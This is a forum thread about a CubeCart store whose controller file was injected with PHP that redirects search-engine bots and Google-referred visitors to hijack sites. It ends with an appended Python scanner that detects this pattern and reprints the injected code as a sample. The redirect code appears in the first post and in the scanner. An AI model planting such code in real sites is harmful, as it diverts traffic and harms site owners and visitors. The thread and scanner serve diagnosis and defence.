Transistor Posted July 7, 2015

Running 5.2.14 with some modifications to convert store to quotation system.

Customer reported that site working OK with direct URL entry but any links from Google were being redirected to another site. After some head scratching and a search of the files for the foreign site name I found the following code had been inserted into /controllers/controller.inc.php.

    if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) {
        header("HTTP/1.1 301 Moved Permanently");
        header("Location: http://www.hijack-site-1.com/");
        exit;
    }
    if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) {
        header("HTTP/1.1 301 Moved Permanently");
        header("Location: http://www.hijack-site-2.com/item/product-folder/item-number.html");
        exit;
    }

I've changed the site CubeCart admin password.

Anyone got any suggestions as to how the code was inserted? File permissions were set at 644.

What do I do to prevent occurrence?

Many thanks.

bsmither Posted July 7, 2015

If you are on a shared hosting server, some attention can be given to the shared hosting provider.

If you are on a dedicated server, then we can look at your site's web access logs and FTP access logs.

Inserted into /controllers/controller.inc.php seems rather specific. The only damage I have seen to code that is on a shared server (where the attack could be blamed on an insecure application on someone else's account) was more general and damaged only every index.php file.

A search on this code, one of the first hits in the result, suggests it is a common method to prevent users and bots from stealing your images found on search engines. But it's rather simple and straightforward, so, probably used in a lot of situations.

havenswift-hosting Posted July 7, 2015

Hi

Brian is correct in that if you are on a dedicated server then it is your security that can be looked at. If you are on shared hosting then they have probably not secured the server to prevent cross account hacking which is common on cheaper hosting. If you are on shared hosting and this has happened then the best advice is to move to a better and more secure hosting company.

Ian

Transistor Posted July 7, 2015

Thanks, guys.

Yes, the site is hosted on my Reseller cPanel-based account which is, itself, on a shared server. (I'm a small-time operator!)

I'll follow up on my webhost's forum.
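
A file scan along the lines of the search described in the first post, as an added example that is not part of the thread or of CubeCart: it flags PHP lines that test the User-Agent or Referer against search-engine names and send a `Location` redirect within a few lines. The function names, the engine-name list and the six-line window are assumptions.

```python
import re
from pathlib import Path

# Cloaking pattern: a UA/Referer test against search-engine names, then a redirect.
HEADER_RE = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_(USER_AGENT|REFERER)['\"]\s*\]", re.I)
ENGINE_RE = re.compile(r"google|slurp|msnbot|bingbot|yahoo", re.I)  # assumed list
REDIRECT_RE = re.compile(r"header\s*\(\s*['\"]Location:\s*([^'\"]+)", re.I)
WINDOW = 6  # assumed: lines from the test within which a redirect counts as related


def scan_source(text):
    """Return (line_no, header, target) for redirects conditioned on UA/Referer."""
    lines = text.splitlines()
    hits = []
    for i, line in enumerate(lines):
        m = HEADER_RE.search(line)
        if not m or not ENGINE_RE.search(line):
            continue
        for later in lines[i:i + WINDOW]:
            r = REDIRECT_RE.search(later)
            if r:
                hits.append((i + 1, m.group(1).upper(), r.group(1).strip()))
                break
    return hits


def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for flagged files."""
    found = {str(p): scan_source(p.read_text(errors="replace")) for p in Path(root).rglob("*.php")}
    return {p: h for p, h in found.items() if h}


# Constructed sample: the block quoted in the first post, one statement per line.
INJECTED = r'''<?php
if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) {
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: http://www.hijack-site-1.com/");
    exit;
}
if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) {
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: http://www.hijack-site-2.com/item/product-folder/item-number.html");
    exit;
}
'''

if __name__ == "__main__":
    for hit in scan_source(INJECTED):
        print(hit)
```

`scan_tree` takes the store's document root and returns only the files that matched, so a hit in a file that should not issue redirects is the thing to review.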